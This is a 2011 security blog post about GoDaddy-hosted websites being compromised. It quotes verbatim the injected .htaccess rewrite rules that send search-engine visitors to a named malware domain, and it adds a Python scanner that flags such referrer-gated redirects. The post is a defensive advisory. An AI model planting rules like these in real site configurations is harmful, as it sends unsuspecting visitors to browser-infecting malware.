Saturday, September 17, 2011

GoDaddy websites Compromised with Malware

Many sites hosted on GoDaddy shared servers are getting compromised today with a conditional redirection to sokoloperkovuskeci.com. In all 445 cases the .htaccess file (a main Apache web server configuration file) was modified to redirect users to a malware site when they were referred by one of a list of search engines. These redirection attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy hosted sites. So it looks like a compromise on their own servers (similar to what has happened in the past).

          This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

The malware checks if anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and, if they are, redirects them to that domain (sokoloperkovuskeci.com). There, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users.
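A way to check your own .htaccess files for this pattern, as an added example that is not part of the original post: it walks the RewriteCond/RewriteRule chains and flags any rule whose conditions test HTTP_REFERER for a search engine and whose target is an off-site URL. The sample input is constructed from the entry quoted above; `own_hosts` is an assumed parameter listing hosts you consider legitimate redirect targets.

```python
from urllib.parse import urlparse

# Assumption: a compromised .htaccess looks like the one quoted in the post:
# a run of RewriteCond lines testing HTTP_REFERER, chained with [OR], ending
# in a RewriteRule that sends the visitor to an external domain.
SEARCH_ENGINES = ("ask.com", "google", "msn.com", "bing.com", "live.com",
                  "aol.com", "altavista", "excite", "yahoo")

# Constructed sample, trimmed from the post's quoted entry.
SAMPLE_HTACCESS = """RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]
"""


def find_referrer_redirects(htaccess_text, own_hosts=()):
    """Return a list of (engines_matched, target_url) for every RewriteRule
    whose preceding RewriteCond lines test HTTP_REFERER against a search
    engine and whose target is an absolute URL on a host not in own_hosts.
    Unquoted, single-token patterns are assumed (as in the quoted entry)."""
    findings = []
    pending = []  # search engines named by the conditions since the last rule
    for raw in htaccess_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            if parts[1].upper() == "%{HTTP_REFERER}":
                pattern = parts[2].lower()
                pending.extend(e for e in SEARCH_ENGINES if e in pattern)
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            host = urlparse(target).netloc.lower()
            # Only a referrer-gated redirect to a foreign host is suspicious
            if pending and host and host not in own_hosts:
                findings.append((sorted(set(pending)), target))
            pending = []  # a RewriteRule consumes the condition chain
    return findings


if __name__ == "__main__":
    for engines, target in find_referrer_redirects(SAMPLE_HTACCESS):
        print("referrer-gated redirect to", target, "for", ", ".join(engines))
```

Run it over every .htaccess under your web root; a clean site with no conditional off-site redirects returns an empty list.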

GoDaddy says they are working with customers to resolve the issue, but if you have a GoDaddy account you should check on this, minimally by Googling for your site and following the link (only if your browser is all patched up and you have sufficient other protections). DomainNameWire also smartly recommends that you check with Google, other search engines and security companies to make sure you haven't been blacklisted.
